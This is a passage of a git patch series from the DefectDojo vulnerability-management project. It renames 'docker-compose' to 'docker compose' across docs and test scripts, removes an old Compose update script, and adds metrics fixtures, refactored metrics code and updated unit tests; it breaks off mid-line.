@@ -46,10 +46,10 @@ The generic upgrade method for docker-compose are as follows:
 - Re-start DefectDojo, allowing for container recreation: `./dc-up-d.sh`
 - Database migrations will be run automatically by the initializer.
Check the output via `docker compose logs initializer` or relevant k8s command
 - If you have the initializer disabled (or if you want to be on the safe side), run the migration command:
-  `docker-compose exec uwsgi /bin/bash -c "python manage.py migrate"`
+  `docker compose exec uwsgi /bin/bash -c "python manage.py migrate"`
 
 ### Building your local images
 
@@ -64,7 +64,7 @@ first.
 git merge origin/master
 ```
 
-Then replace the first step of the above generic upgrade method for docker-compose with: `docker-compose build`
+Then replace the first step of the above generic upgrade method for docker compose with: `docker compose build`
 
 ## godojo installations
diff --git a/docs/content/en/integrations/jira.md b/docs/content/en/integrations/jira.md
index e7a19329bd4..b6bc83fe206 100644
--- a/docs/content/en/integrations/jira.md
+++ b/docs/content/en/integrations/jira.md
@@ -167,19 +167,19 @@ optional arguments:
 This can be executed from the uwsgi docker container using:
 
 {{< highlight bash >}}
-$ docker-compose exec uwsgi /bin/bash -c 'python manage.py jira_status_reconciliation'
+$ docker compose exec uwsgi /bin/bash -c 'python manage.py jira_status_reconciliation'
 {{< /highlight >}}
 
 DEBUG output can be obtained via `-v 3`, but only after increasing the logging to DEBUG level in your settings.dist.py or local_settings.py file.
 
 {{< highlight bash >}}
-$ docker-compose exec uwsgi /bin/bash -c 'python manage.py jira_status_reconciliation -v 3'
+$ docker compose exec uwsgi /bin/bash -c 'python manage.py jira_status_reconciliation -v 3'
 {{< /highlight >}}
 
 At the end of the command a semicolon-separated CSV summary will be printed. This can be captured by redirecting stdout to a file:
 
 {{< highlight bash >}}
-$ docker-compose exec uwsgi /bin/bash -c 'python manage.py jira_status_reconciliation > jira_reconciliation.csv'
+$ docker compose exec uwsgi /bin/bash -c 'python manage.py jira_status_reconciliation > jira_reconciliation.csv'
 {{< /highlight >}}
 
diff --git a/docs/content/en/integrations/ldap-authentication.md b/docs/content/en/integrations/ldap-authentication.md
index 17697043736..307f1029a0a 100644
--- a/docs/content/en/integrations/ldap-authentication.md
+++ b/docs/content/en/integrations/ldap-authentication.md
@@ -116,7 +116,7 @@ Read the docs for Django Authentication with LDAP here: https://django-auth-ldap
 
 #### docker-compose.yml
 
-In order to pass the variables to the settings.dist.py file via docker, it's a good idea to add these to the docker-compose file.
+In order to pass the variables to the settings.dist.py file via docker, it's a good idea to add these to the docker compose file.
 You can do this by adding the following variables to the environment section for the uwsgi image:
 ```yaml
diff --git a/docs/content/en/usage/features.md b/docs/content/en/usage/features.md
index f1020ffd4c0..5f99f34023f 100644
--- a/docs/content/en/usage/features.md
+++ b/docs/content/en/usage/features.md
@@ -357,7 +357,7 @@ to the hashcode configuration or calculation logic. We will mention this in the
 To regenerate the hashcodes, use the `dedupe` management command:
 
 {{< highlight bash >}}
-docker-compose exec uwsgi ./manage.py dedupe --hash_code_only
+docker compose exec uwsgi ./manage.py dedupe --hash_code_only
 {{< / highlight >}}
 
 This will only regenerate the hashcodes, but will not run any deduplication logic on existing findings.
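Taken together, a reasonable sequence after changing a hashcode configuration looks like the sketch below; both commands are quoted from this page, but the ordering is a suggested workflow rather than a prescribed one:

```bash
# Step 1: recompute hash_codes only; nothing is marked as duplicate yet
docker compose exec uwsgi ./manage.py dedupe --hash_code_only

# Step 2: run the actual deduplication against the fresh hash_codes
# (each finding is processed in a celery task; a synchronous variant follows below)
docker compose exec uwsgi ./manage.py dedupe
```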
@@ -365,14 +365,14 @@ If you want to run deduplication again on existing findings to make sure any dup
 hashcode config are marked as such, run:
 
 {{< highlight bash >}}
-docker-compose exec uwsgi ./manage.py dedupe
+docker compose exec uwsgi ./manage.py dedupe
 {{< / highlight >}}
 
 The deduplication part of this command will run the deduplication for each finding in a celery task. If you want to run the deduplication in the foreground process, use:
 
 {{< highlight bash >}}
-docker-compose exec uwsgi ./manage.py dedupe --dedupe_sync
+docker compose exec uwsgi ./manage.py dedupe --dedupe_sync
 {{< / highlight >}}
 
 Please note the deduplication process is resource intensive and can take a long time to complete
@@ -502,10 +502,10 @@ You can of course change this default by modifying that stanza.
 
 ### Launching from the CLI
 
 You can also invoke the SLA notification function from the CLI. For
-example, if run from docker-compose:
+example, if run from docker compose:
 
 {{< highlight bash >}}
-$ docker-compose exec uwsgi /bin/bash -c 'python manage.py sla_notifications'
+$ docker compose exec uwsgi /bin/bash -c 'python manage.py sla_notifications'
 {{< / highlight >}}
 
 ## Reports
diff --git a/readme-docs/DOCKER.md b/readme-docs/DOCKER.md
index d757f8eb810..a85d9f55f26 100644
--- a/readme-docs/DOCKER.md
+++ b/readme-docs/DOCKER.md
@@ -8,7 +8,7 @@ Although Docker Compose is one of the supported installation methods to deploy a
 # Prerequisites
 
 * Docker version
-  * Installing with docker-compose requires at least Docker 19.03.0 and Docker Compose 1.28.0. See "Checking Docker versions" below for version errors during running docker-compose.
+  * Installing with docker compose requires at least Docker 19.03.0 and Docker Compose 1.28.0. See "Checking Docker versions" below for version errors when running docker compose.
 * Proxies
   * If you're behind a corporate proxy check https://docs.docker.com/network/proxy/ .
 
@@ -100,7 +100,7 @@ This will run the application based on merged configurations from docker-compose
 * Hot-reloading for the **celeryworker** container is not yet implemented. When working on deduplication for example, restart the celeryworker container with:
 
 ```
-docker-compose restart celeryworker
+docker compose restart celeryworker
 ```
 
 * The postgres port is forwarded to the host so that you can access your database from outside the container.
 
@@ -126,7 +126,7 @@ To find out the admin password, check the very beginning of the console output
 of the initializer container by running:
 
 ```zsh
-docker-compose logs initializer | grep "Admin password:"
+docker compose logs initializer | grep "Admin password:"
 ```
 
 Make sure you write down the first password generated as you'll need it when re-starting the application.
 
 If you
 docker exec -it django-defectdojo-uwsgi-1 ./manage.py changepassword admin
 ```
 
 # Logging
-For docker-compose release mode the log level is INFO. In the other modes the log level is DEBUG. Logging is configured in `settings.dist.py` and can be tuned using a `local_settings.py`, see [template for local_settings.py](dojo/settings/template-local_settings).
+For docker compose release mode the log level is INFO. In the other modes the log level is DEBUG. Logging is configured in `settings.dist.py` and can be tuned using a `local_settings.py`, see [template for local_settings.py](dojo/settings/template-local_settings).
For example the deduplication logger can be set to DEBUG in a local_settings.py file:
 
```
@@ -251,7 +251,7 @@ To change the port:
 - update `docker-compose.override.https.yml` (or set DD_TLS_PORT in the environment)
 - restart the application
 
-NB: some third party software may require to change the exposed port in Dockerfile.nginx as they use docker-compose declarations to discover which ports to map when publishing the application.
+NB: some third party software may require changing the exposed port in Dockerfile.nginx as they use docker compose declarations to discover which ports to map when publishing the application.
 
 # Run the tests with Docker Compose
@@ -324,7 +324,7 @@ docker logs -f django-defectdojo_integration-tests_1
 
 # Checking Docker versions
 
-Run the following to determine the versions for docker and docker-compose:
+Run the following to determine the versions for docker and docker compose:
 
 ```zsh
 $ docker version
 Server:
  OS/Arch:      linux/amd64
  Experimental: false
 
-$ docker-compose version
-docker-compose version 1.18.0, build 8dd22a9
+$ docker compose version
+Docker Compose version 1.18.0, build 8dd22a9
 docker-py version: 2.6.1
 CPython version: 2.7.13
 OpenSSL version: OpenSSL 1.0.1t 3 May 2016
 ```
 
-In this case, both docker (version 17.09.0-ce) and docker-compose (1.18.0) need to be updated.
+In this case, both docker (version 17.09.0-ce) and docker compose (1.18.0) need to be updated.
 
 Follow [Docker's documentation](https://docs.docker.com/install/) for your OS to get the latest version of Docker. For the docker command, most OSes have a built-in update mechanism like "apt upgrade".
 
-Docker Compose isn't packaged like Docker and you'll need to manually update an existing install if using Linux. For Linux, either follow the instructions in the [Docker Compose documentation](https://docs.docker.com/compose/install/) or use the shell script below. The script below will update docker-compose to the latest version automatically.
You will need to make the script executable and have sudo privileges to upgrade docker-compose: - -```zsh -#!/bin/bash - -# Set location of docker-compose binary - shouldn't need to modify this -DESTINATION=/usr/local/bin/docker-compose - -# Get latest docker-compose version -VERSION=$(curl --silent https://api.github.com/repos/docker/compose/releases/latest | jq .name -r) - -# Output some info on what this is going to do -echo "Note: docker-compose version $VERSION will be downloaded from:" -echo "https://github.com/docker/compose/releases/download/${VERSION}/docker-compose-$(uname -s)-$(uname -m)" -echo "Enter sudo password to install docker-compose" - -# Download and install latest docker compose -sudo curl -L https://github.com/docker/compose/releases/download/${VERSION}/docker-compose-$(uname -s)-$(uname -m) -o $DESTINATION -sudo chmod +x $DESTINATION - -# Output new docker-compose version info -echo "" -docker-compose version -``` - -Running the script above will look like: - -```zsh -$ vi update-docker-compose -$ chmod u+x update-docker-compose -$ ./update-docker-compose -Note: docker-compose version 1.24.0 will be downloaded from: -https://github.com/docker/compose/releases/download/1.24.0/docker-compose-Linux-x86_64 -Enter sudo password to install docker-compose - % Total % Received % Xferd Average Speed Time Time Time Current - Dload Upload Total Spent Left Speed -100 617 0 617 0 0 1778 0 --:--:-- --:--:-- --:--:-- 1778 -100 15.4M 100 15.4M 0 0 2478k 0 0:00:06 0:00:06 --:--:-- 2910k - -docker-compose version 1.24.0, build 0aa59064 -docker-py version: 3.7.2 -CPython version: 3.6.8 -OpenSSL version: OpenSSL 1.1.0j 20 Nov 2018 -``` diff --git a/tests/local-integration-tests.sh b/tests/local-integration-tests.sh index afbb624f946..db814125321 100755 --- a/tests/local-integration-tests.sh +++ b/tests/local-integration-tests.sh @@ -12,7 +12,7 @@ echo "Running Product type integration tests" if python3 tests/regulations_test.py ; then echo "Success: Regulation integration tests passed" else - docker-compose logs uwsgi --tail=120 + docker compose logs uwsgi --tail=120 echo "Error: Regulation integration test failed."; exit 1 fi @@ -20,7 +20,7 @@ echo "Running Product type integration tests" if python3 tests/product_type_test.py ; then echo "Success: Product type integration tests passed" else - docker-compose logs uwsgi --tail=120 + docker compose logs uwsgi --tail=120 echo "Error: Product type integration test failed."; exit 1 fi @@ -28,7 +28,7 @@ echo "Running Product integration tests" if python3 tests/product_test.py ; then echo "Success: Product integration tests passed" else - docker-compose logs uwsgi --tail=120 + docker compose logs uwsgi --tail=120 echo "Error: Product integration test failed"; exit 1 fi @@ -36,7 +36,7 @@ echo "Running Dedupe integration tests" if python3 tests/dedupe_test.py ; then echo "Success: Dedupe integration tests passed" else - docker-compose logs uwsgi --tail=120 + docker compose logs uwsgi --tail=120 echo "Error: Dedupe integration test failed"; exit 1 fi @@ -44,7 +44,7 @@ echo "Running Endpoint integration tests" if python3 tests/endpoint_test.py ; then echo "Success: Endpoint integration tests passed" else - docker-compose logs uwsgi --tail=120 + docker compose logs uwsgi --tail=120 echo "Error: Endpoint integration test failed"; exit 1 fi @@ -52,7 +52,7 @@ echo "Running Engagement integration tests" if python3 tests/engagement_test.py ; then echo "Success: Engagement integration tests passed" else - docker-compose logs uwsgi --tail=120 + docker 
compose logs uwsgi --tail=120 echo "Error: Engagement integration test failed"; exit 1 fi @@ -60,7 +60,7 @@ echo "Running Environment integration tests" if python3 tests/environment_test.py ; then echo "Success: Environment integration tests passed" else - docker-compose logs uwsgi --tail=120 + docker compose logs uwsgi --tail=120 echo "Error: Environment integration test failed"; exit 1 fi @@ -68,7 +68,7 @@ echo "Running Finding integration tests" if python3 tests/finding_test.py ; then echo "Success: Finding integration tests passed" else - docker-compose logs uwsgi --tail=120 + docker compose logs uwsgi --tail=120 echo "Error: Finding integration test failed"; exit 1 fi @@ -76,7 +76,7 @@ echo "Running Test integration tests" if python3 tests/test_test.py ; then echo "Success: Test integration tests passed" else - docker-compose logs uwsgi --tail=120 + docker compose logs uwsgi --tail=120 echo "Error: Test integration test failed"; exit 1 fi @@ -84,7 +84,7 @@ echo "Running User integration tests" if python3 tests/user_test.py ; then echo "Success: User integration tests passed" else - docker-compose logs uwsgi --tail=120 + docker compose logs uwsgi --tail=120 echo "Error: User integration test failed"; exit 1 fi @@ -92,7 +92,7 @@ echo "Running Ibm Appscan integration test" if python3 tests/ibm_appscan_test.py ; then echo "Success: Ibm AppScan integration tests passed" else - docker-compose logs uwsgi --tail=120 + docker compose logs uwsgi --tail=120 echo "Error: Ibm AppScan integration test failed"; exit 1 fi @@ -100,7 +100,7 @@ echo "Running Report Builder integration tests" if python3 tests/report_builder_test.py ; then echo "Success: Report Builder integration tests passed" else - docker-compose logs uwsgi --tail=120 + docker compose logs uwsgi --tail=120 echo "Error: Report Builder integration test failed."; exit 1 fi @@ -108,7 +108,7 @@ echo "Running Search integration test" if python3 tests/search_test.py ; then echo "Success: Search integration tests passed" else - docker-compose logs uwsgi --tail=120 + docker compose logs uwsgi --tail=120 echo "Error: Search integration test failed"; exit 1 fi From e948cde47659b64a8e2133efa25f6e3da2c01372 Mon Sep 17 00:00:00 2001 From: dogboat Date: Fri, 20 Sep 2024 17:09:12 -0400 Subject: [PATCH 41/62] Metrics findings tests (#10930) * metrics-findings-tests some work on updating metrics findings tests; includes some changes to metrics utils to improve readability and adjust timeframes returned for data sets * metrics-findings-tests linter fixes on metrics unittest * metrics-findings-tests linter fix on metrics utils * metrics-findings-tests tweaking tests * metrics-findings-tests undo fixtures changes * metrics-findings-tests add new test data * metrics-findings-tests fix fixtures * metrics-findings-tests update tests * metrics-findings-tests linter fixes * metrics-findings-tests move new metrics finding data to its own fixture --- .../unit_metrics_additional_data.json | 482 ++++++++++++++++++ dojo/metrics/utils.py | 72 +-- dojo/static/dojo/js/metrics.js | 16 +- unittests/test_metrics_queries.py | 114 +++-- 4 files changed, 601 insertions(+), 83 deletions(-) create mode 100644 dojo/fixtures/unit_metrics_additional_data.json diff --git a/dojo/fixtures/unit_metrics_additional_data.json b/dojo/fixtures/unit_metrics_additional_data.json new file mode 100644 index 00000000000..721e47eaac6 --- /dev/null +++ b/dojo/fixtures/unit_metrics_additional_data.json @@ -0,0 +1,482 @@ +[ + { + "pk": 240, + "model": "dojo.finding", + "fields": { + 
"last_reviewed_by": null, + "reviewers": [], + "static_finding": false, + "date": "2018-01-01", + "references": "", + "files": [], + "payload": null, + "under_defect_review": false, + "impact": "High", + "false_p": false, + "verified": false, + "severity": "High", + "title": "High Impact Test Finding", + "param": null, + "created": "2017-12-01T00:00:00Z", + "duplicate": true, + "mitigation": "test mitigation", + "found_by": [ + 1 + ], + "numerical_severity": "S0", + "test": 3, + "out_of_scope": false, + "cwe": null, + "file_path": "", + "duplicate_finding": 2, + "description": "test finding", + "mitigated_by": null, + "reporter": 1, + "mitigated": null, + "active": true, + "line": null, + "under_review": false, + "defect_review_requested_by": 1, + "review_requested_by": 1, + "thread_id": 11, + "url": null, + "notes": [], + "dynamic_finding": false, + "hash_code": "5d368a051fdec959e08315a32ef633ba5711bed6e8e75319ddee2cab4d4608c7", + "last_reviewed": null + } + }, + { + "pk": 241, + "model": "dojo.finding", + "fields": { + "last_reviewed_by": null, + "reviewers": [], + "static_finding": false, + "date": "2018-01-01", + "references": "", + "files": [], + "payload": null, + "under_defect_review": false, + "impact": "High", + "false_p": false, + "verified": false, + "severity": "High", + "title": "High Impact Test Finding", + "param": null, + "created": "2017-12-01T00:00:00Z", + "duplicate": true, + "mitigation": "test mitigation", + "found_by": [ + 1 + ], + "numerical_severity": "S0", + "test": 3, + "out_of_scope": false, + "cwe": null, + "file_path": "", + "duplicate_finding": 2, + "description": "test finding", + "mitigated_by": null, + "reporter": 1, + "mitigated": null, + "active": false, + "line": null, + "under_review": false, + "defect_review_requested_by": 1, + "review_requested_by": 1, + "thread_id": 11, + "url": null, + "notes": [], + "dynamic_finding": false, + "hash_code": "5d368a051fdec959e08315a32ef633ba5711bed6e8e75319ddee2cab4d4608c7", + "last_reviewed": null, + "risk_accepted": true + } + }, + { + "pk": 242, + "model": "dojo.finding", + "fields": { + "last_reviewed_by": null, + "reviewers": [], + "static_finding": false, + "date": "2018-01-01", + "references": "", + "files": [], + "payload": null, + "under_defect_review": false, + "impact": "High", + "false_p": false, + "verified": false, + "severity": "High", + "title": "High Impact Test Finding", + "param": null, + "created": "2017-12-01T00:00:00Z", + "duplicate": true, + "mitigation": "test mitigation", + "found_by": [ + 1 + ], + "numerical_severity": "S0", + "test": 3, + "out_of_scope": false, + "cwe": null, + "file_path": "", + "duplicate_finding": 2, + "description": "test finding", + "mitigated_by": null, + "reporter": 1, + "mitigated": null, + "active": false, + "line": null, + "under_review": false, + "defect_review_requested_by": 1, + "review_requested_by": 1, + "thread_id": 11, + "url": null, + "notes": [], + "dynamic_finding": false, + "hash_code": "5d368a051fdec959e08315a32ef633ba5711bed6e8e75319ddee2cab4d4608c7", + "last_reviewed": null, + "risk_accepted": true + } + }, + { + "pk": 243, + "model": "dojo.finding", + "fields": { + "last_reviewed_by": null, + "reviewers": [], + "static_finding": false, + "date": "2017-12-31", + "references": "", + "files": [], + "payload": null, + "under_defect_review": false, + "impact": "High", + "false_p": false, + "verified": false, + "severity": "High", + "title": "DUMMY FINDING", + "param": null, + "created": "2017-12-01T00:00:00Z", + "duplicate": false, + "mitigation": 
"MITIGATION", + "found_by": [ + 1 + ], + "numerical_severity": "S0", + "test": 3, + "out_of_scope": false, + "cwe": 1, + "file_path": "", + "duplicate_finding": null, + "description": "TEST finding", + "mitigated_by": null, + "reporter": 2, + "mitigated": null, + "active": false, + "line": 100, + "under_review": false, + "defect_review_requested_by": 2, + "review_requested_by": 2, + "thread_id": 1, + "url": "http://www.example.com", + "notes": [ + 1 + ], + "dynamic_finding": false, + "hash_code": "c89d25e445b088ba339908f68e15e3177b78d22f3039d1bfea51c4be251bf4e0", + "last_reviewed": null, + "risk_accepted": true, + "is_mitigated": true + } + }, + { + "pk": 244, + "model": "dojo.finding", + "fields": { + "last_reviewed_by": null, + "reviewers": [], + "static_finding": false, + "date": "2017-12-29", + "references": "", + "files": [], + "payload": null, + "under_defect_review": false, + "impact": "Low", + "false_p": false, + "verified": true, + "severity": "Low", + "title": "Low Impact Test Finding", + "param": null, + "created": "2017-12-01T00:00:00Z", + "duplicate": false, + "mitigation": "test mitigation", + "found_by": [ + 1 + ], + "numerical_severity": "S0", + "test": 33, + "out_of_scope": false, + "cwe": null, + "file_path": "/dev/urandom", + "duplicate_finding": null, + "description": "test finding", + "mitigated_by": null, + "reporter": 1, + "mitigated": null, + "active": true, + "line": 123, + "under_review": false, + "defect_review_requested_by": 1, + "review_requested_by": 1, + "thread_id": 11, + "url": null, + "notes": [], + "dynamic_finding": false, + "hash_code": "9aca00affd340c4da02c934e7e3106a45c6ad0911da479daae421b3b28a2c1aa", + "last_reviewed": null + } + }, + { + "pk": 245, + "model": "dojo.finding", + "fields": { + "last_reviewed_by": null, + "reviewers": [], + "static_finding": false, + "date": "2017-12-27", + "references": "", + "files": [], + "payload": null, + "under_defect_review": false, + "impact": "Low", + "false_p": false, + "verified": false, + "severity": "Low", + "title": "Low Impact Test Finding", + "param": null, + "created": "2017-12-01T00:00:00Z", + "duplicate": true, + "mitigation": "test mitigation", + "found_by": [ + 1 + ], + "numerical_severity": "S0", + "test": 33, + "out_of_scope": false, + "cwe": null, + "file_path": "/dev/urandom", + "duplicate_finding": 22, + "description": "test finding", + "mitigated_by": null, + "reporter": 1, + "mitigated": null, + "active": false, + "line": 123, + "under_review": false, + "defect_review_requested_by": 1, + "review_requested_by": 1, + "thread_id": 11, + "url": null, + "notes": [], + "dynamic_finding": false, + "hash_code": "9aca00affd340c4da02c934e7e3106a45c6ad0911da479daae421b3b28a2c1aa", + "last_reviewed": null + } + }, + { + "pk": 246, + "model": "dojo.finding", + "fields": { + "last_reviewed_by": null, + "reviewers": [], + "static_finding": false, + "date": "2018-01-02", + "references": "", + "files": [], + "payload": null, + "under_defect_review": false, + "impact": "Low", + "false_p": false, + "verified": false, + "severity": "Low", + "title": "Low Impact Test Finding", + "param": null, + "created": "2017-12-01T00:00:00Z", + "duplicate": true, + "mitigation": "test mitigation", + "found_by": [ + 1 + ], + "numerical_severity": "S0", + "test": 33, + "out_of_scope": false, + "cwe": null, + "file_path": "/dev/urandom", + "duplicate_finding": 22, + "description": "test finding", + "mitigated_by": null, + "reporter": 1, + "mitigated": null, + "active": false, + "line": 123, + "under_review": false, + 
"defect_review_requested_by": 1, + "review_requested_by": 1, + "thread_id": 11, + "url": null, + "notes": [], + "dynamic_finding": false, + "hash_code": "9aca00affd340c4da02c934e7e3106a45c6ad0911da479daae421b3b28a2c1aa", + "last_reviewed": null + } + }, + { + "pk": 247, + "model": "dojo.finding", + "fields": { + "unique_id_from_tool": 12345, + "last_reviewed_by": null, + "reviewers": [], + "static_finding": false, + "date": "2018-01-03", + "references": "", + "files": [], + "payload": null, + "under_defect_review": false, + "impact": "Low", + "false_p": false, + "verified": false, + "severity": "Low", + "title": "Low Impact Test Finding", + "param": null, + "created": "2017-12-01T00:00:00Z", + "duplicate": true, + "mitigation": "test mitigation", + "found_by": [ + 1 + ], + "numerical_severity": "S0", + "test": 55, + "out_of_scope": false, + "cwe": null, + "file_path": "/dev/urandom", + "duplicate_finding": null, + "description": "test finding", + "mitigated_by": null, + "reporter": 1, + "mitigated": null, + "active": false, + "line": 123, + "under_review": false, + "defect_review_requested_by": 1, + "review_requested_by": 1, + "thread_id": 11, + "url": null, + "notes": [], + "dynamic_finding": false, + "hash_code": "9aca00affd340c4da02c934e7e3106a45c6ad0911da479daae421b3b28a2c1aa", + "last_reviewed": null + } + }, + { + "pk": 248, + "model": "dojo.finding", + "fields": { + "unique_id_from_tool": 6789, + "last_reviewed_by": null, + "reviewers": [], + "static_finding": false, + "date": "2017-12-27", + "references": "", + "files": [], + "payload": null, + "under_defect_review": false, + "impact": "Low", + "false_p": false, + "verified": true, + "severity": "Low", + "title": "UID Impact Test Finding", + "param": null, + "created": "2017-12-01T00:00:00Z", + "duplicate": false, + "mitigation": "test mitigation", + "found_by": [ + 1 + ], + "numerical_severity": "S0", + "test": 77, + "out_of_scope": false, + "cwe": null, + "file_path": "/dev/urandom", + "duplicate_finding": null, + "description": "test finding", + "mitigated_by": null, + "reporter": 1, + "mitigated": null, + "active": true, + "line": 123, + "under_review": false, + "defect_review_requested_by": 1, + "review_requested_by": 1, + "thread_id": 11, + "url": null, + "notes": [], + "dynamic_finding": false, + "hash_code": "6f8d0bf970c14175e597843f4679769a4775742549d90f902ff803de9244c7e1", + "last_reviewed": null, + "is_mitigated": true + } + }, + { + "pk": 249, + "model": "dojo.finding", + "fields": { + "unique_id_from_tool": 6789, + "last_reviewed_by": null, + "reviewers": [], + "static_finding": false, + "date": "2018-01-04", + "references": "", + "files": [], + "payload": null, + "under_defect_review": false, + "impact": "Low", + "false_p": false, + "verified": false, + "severity": "Low", + "title": "UID Impact Test Finding", + "param": null, + "created": "2017-12-01T00:00:00Z", + "duplicate": true, + "mitigation": "test mitigation", + "found_by": [ + 1 + ], + "numerical_severity": "S0", + "test": 77, + "out_of_scope": false, + "cwe": null, + "file_path": "/dev/urandom", + "duplicate_finding": 224, + "description": "test finding", + "mitigated_by": null, + "reporter": 1, + "mitigated": null, + "active": false, + "line": 123, + "under_review": false, + "defect_review_requested_by": 1, + "review_requested_by": 1, + "thread_id": 11, + "url": null, + "notes": [], + "dynamic_finding": false, + "hash_code": "6f8d0bf970c14175e597843f4679769a4775742549d90f902ff803de9244c7e1", + "last_reviewed": null + } + } +] \ No newline at end of file diff 
--git a/dojo/metrics/utils.py b/dojo/metrics/utils.py index 8ca345b41f7..d9e01e9a1b8 100644 --- a/dojo/metrics/utils.py +++ b/dojo/metrics/utils.py @@ -3,8 +3,7 @@ from datetime import date, datetime, timedelta from enum import Enum from functools import partial -from math import ceil -from typing import Any, Callable, NamedTuple, TypeVar, Union +from typing import Any, Callable, NamedTuple, Type, TypeVar, Union from dateutil.relativedelta import relativedelta from django.contrib import messages @@ -35,12 +34,19 @@ ) +def get_metrics_finding_filter_class() -> Type[Union[MetricsFindingFilter, MetricsFindingFilterWithoutObjectLookups]]: + if get_system_setting("filter_string_matching", False): + return MetricsFindingFilterWithoutObjectLookups + else: + return MetricsFindingFilter + + def finding_queries( prod_type: QuerySet[Product_Type], request: HttpRequest, ) -> dict[str, Any]: # Get the initial list of findings the user is authorized to see - findings_query = get_authorized_findings( + all_authorized_findings: QuerySet[Finding] = get_authorized_findings( Permissions.Finding_View, user=request.user, ).select_related( @@ -54,46 +60,47 @@ def finding_queries( "test__test_type", ) - filter_string_matching = get_system_setting("filter_string_matching", False) - finding_filter_class = MetricsFindingFilterWithoutObjectLookups if filter_string_matching else MetricsFindingFilter - findings = finding_filter_class(request.GET, queryset=findings_query) - form = findings.form - findings_qs = queryset_check(findings) - # Quick check to determine if the filters were too tight and filtered everything away - if not findings_qs.exists() and not findings_query.exists(): - findings = findings_query - findings_qs = findings if isinstance(findings, QuerySet) else findings.qs + finding_filter_class = get_metrics_finding_filter_class() + findings_filter = finding_filter_class(request.GET, queryset=all_authorized_findings) + form = findings_filter.form + filtered_findings: QuerySet[Finding] = queryset_check(findings_filter) + # Quick check to determine if the filters were too tight and filtered everything away. If so, fall back to using all + # authorized Findings instead. + if not filtered_findings.exists() and all_authorized_findings.exists(): + filtered_findings = all_authorized_findings messages.add_message( request, messages.ERROR, _("All objects have been filtered away. 
Displaying all objects"), extra_tags="alert-danger") - start_date, end_date = get_date_range(findings_qs) + start_date, end_date = get_date_range(filtered_findings) # Filter by the date ranges supplied - findings_query = findings_query.filter(date__range=[start_date, end_date]) + all_findings_within_date_range = all_authorized_findings.filter(date__range=[start_date, end_date]) # Get the list of closed and risk accepted findings - findings_closed = findings_query.filter(CLOSED_FINDINGS_QUERY) - accepted_findings = findings_query.filter(ACCEPTED_FINDINGS_QUERY) - active_findings = findings_query.filter(OPEN_FINDINGS_QUERY) + closed_filtered_findings = all_findings_within_date_range.filter(CLOSED_FINDINGS_QUERY) + accepted_filtered_findings = all_findings_within_date_range.filter(ACCEPTED_FINDINGS_QUERY) + active_filtered_findings = all_findings_within_date_range.filter(OPEN_FINDINGS_QUERY) # filter by product type if applicable if len(prod_type) > 0: - findings_query = findings_query.filter(test__engagement__product__prod_type__in=prod_type) - findings_closed = findings_closed.filter(test__engagement__product__prod_type__in=prod_type) - accepted_findings = accepted_findings.filter(test__engagement__product__prod_type__in=prod_type) - active_findings = active_findings.filter(test__engagement__product__prod_type__in=prod_type) + all_findings_within_date_range = all_findings_within_date_range.filter( + test__engagement__product__prod_type__in=prod_type) + closed_filtered_findings = closed_filtered_findings.filter(test__engagement__product__prod_type__in=prod_type) + accepted_filtered_findings = accepted_filtered_findings.filter( + test__engagement__product__prod_type__in=prod_type) + active_filtered_findings = active_filtered_findings.filter(test__engagement__product__prod_type__in=prod_type) # Get the severity counts of risk accepted findings - accepted_findings_counts = severity_count(accepted_findings, "aggregate", "severity") + accepted_findings_counts = severity_count(accepted_filtered_findings, "aggregate", "severity") weeks_between, months_between = period_deltas(start_date, end_date) query_counts_for_period = query_counts( - findings_query, - active_findings, - accepted_findings, + all_findings_within_date_range, + active_filtered_findings, + accepted_filtered_findings, start_date, MetricsType.FINDING, ) @@ -117,9 +124,9 @@ def finding_queries( )[:10] return { - "all": findings_query, - "closed": findings_closed, - "accepted": accepted_findings, + "all": filtered_findings, + "closed": closed_filtered_findings, + "accepted": accepted_filtered_findings, "accepted_count": accepted_findings_counts, "top_ten": top_ten, "monthly_counts": monthly_counts, @@ -454,13 +461,8 @@ def period_deltas(start_date, end_date): :return: A tuple of integers representing (number of weeks between the dates, number of months between the dates) """ r = relativedelta(end_date, start_date) - months_between = (r.years * 12) + r.months - # include current month - months_between += 1 - - weeks_between = int(ceil((((r.years * 12) + r.months) * 4.33) + (r.days / 7))) - if weeks_between <= 0: - weeks_between += 2 + months_between = max((r.years * 12) + r.months, 2) + weeks_between = max((end_date - start_date).days // 7, 2) return weeks_between, months_between diff --git a/dojo/static/dojo/js/metrics.js b/dojo/static/dojo/js/metrics.js index 2e95555d379..2fd518aa3a1 100644 --- a/dojo/static/dojo/js/metrics.js +++ b/dojo/static/dojo/js/metrics.js @@ -103,11 +103,16 @@ function homepage_severity_plot(critical, high, 
medium, low) { dashboard-metrics.html */ +function getTicks(critical, high, medium, low) { + return [...new Set(critical.concat(high, medium, low).map(x => x[0]))] +} + function opened_per_month(critical, high, medium, low) { var options = { xaxes: [{ mode: 'time', - timeformat: "%m/%y" + timeformat: "%m/%y", + ticks: getTicks(critical, high, medium, low), }], yaxes: [{ min: 0 @@ -153,7 +158,8 @@ function accepted_per_month(critical, high, medium, low) { var options = { xaxes: [{ mode: 'time', - timeformat: "%m/%y" + timeformat: "%m/%y", + ticks: getTicks(critical, high, medium, low), }], yaxes: [{ min: 0 @@ -199,7 +205,8 @@ function opened_per_week(critical, high, medium, low) { var options = { xaxes: [{ mode: 'time', - timeformat: "%m/%d/%Y" + timeformat: "%m/%d/%Y", + ticks: getTicks(critical, high, medium, low), }], yaxes: [{ min: 0 @@ -245,7 +252,8 @@ function accepted_per_week(critical, high, medium, low) { var options = { xaxes: [{ mode: 'time', - timeformat: "%m/%d/%Y" + timeformat: "%m/%d/%Y", + ticks: getTicks(critical, high, medium, low), }], yaxes: [{ min: 0 diff --git a/unittests/test_metrics_queries.py b/unittests/test_metrics_queries.py index c52c602ea33..460b426e8b4 100644 --- a/unittests/test_metrics_queries.py +++ b/unittests/test_metrics_queries.py @@ -20,12 +20,43 @@ def add(*args, **kwargs): pass +#### +# Test Findings data +#### +FINDING_1 = {"id": 4, "title": "High Impact Test Finding", "date": date(2018, 1, 1), "sla_start_date": None, "sla_expiration_date": None, "cwe": None, "cve": None, "epss_score": None, "epss_percentile": None, "cvssv3": None, "cvssv3_score": None, "url": None, "severity": "High", "description": "test finding", "mitigation": "test mitigation", "impact": "High", "steps_to_reproduce": None, "severity_justification": None, "references": "", "test_id": 3, "active": False, "verified": False, "false_p": False, "duplicate": True, "duplicate_finding_id": 2, "out_of_scope": False, "risk_accepted": False, "under_review": False, "last_status_update": None, "review_requested_by_id": 1, "under_defect_review": False, "defect_review_requested_by_id": 1, "is_mitigated": 